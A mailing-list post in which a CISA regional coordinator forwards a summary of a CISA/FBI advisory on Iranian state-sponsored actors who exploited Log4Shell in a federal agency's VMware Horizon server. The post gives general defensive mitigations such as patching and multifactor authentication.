[CDP-development] CISA and FBI Release Advisory on Iranian Government-Sponsored APT Actors Compromise Federal Network

Masse, Theresa theresa.masse at cisa.dhs.gov
Wed Nov 16 07:19:31 PST 2022 

FYSA

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) published a joint Cybersecurity Advisory (CSA) about suspected Iranian government-sponsored actors that compromised a federal civilian executive branch (FCEB) agency. The advisory, "Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester<https://www.cisa.gov/uscert/ncas/alerts/aa22-320a>" provides information on their tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.

During an incident response at a federal agency, CISA determined the advanced persistent threat (APT) actors had exploited the Log4Shell vulnerability in unpatched VMware Horizon server on federal agency's network for initial access. With access, the Iranian APT actors installed software and proxies that enabled them to move laterally, compromise credentials, and maintain persistence. This activity was first detected during routine, retrospective analysis using EINSTEIN, an FCEB-wide intrusion detection system (IDS) operated and monitored by CISA.

Organizations that suspect initial access or compromise is detected based on IOCs or TTPs are advised to assume lateral movement by threat actors and investigate connected systems and the domain controller (DC).

Some of the recommended mitigations include install updated builds to ensure affected VMware Horizon and Unified Access Gateway systems are updated to the latest version; keep all software up to date and prioritize patching known exploited vulnerabilities; and use best practices for identity and access management (IAM) by implementing multifactor authentication (MFA) and enforcing use of strong passwords.

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. Network defenders are recommended to test existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

Theresa A. Masse
Cybersecurity State Coordinator/Advisor, Region 10 (Oregon)
Cybersecurity and Infrastructure Security Agency
Department of Homeland Security
Phone: (503) 930-5671
Email: theresa.masse at cisa.dhs.gov<mailto:theresa.masse at cisa.dhs.gov>

[cid:image001.png at 01D8F98B.9A340360]


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://omls.oregon.gov/pipermail/cdp-development/attachments/20221116/1ebff002/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image001.png
Type: image/png
Size: 16152 bytes
Desc: image001.png
URL: <https://omls.oregon.gov/pipermail/cdp-development/attachments/20221116/1ebff002/attachment-0001.png>

More information about the CDP-development mailing list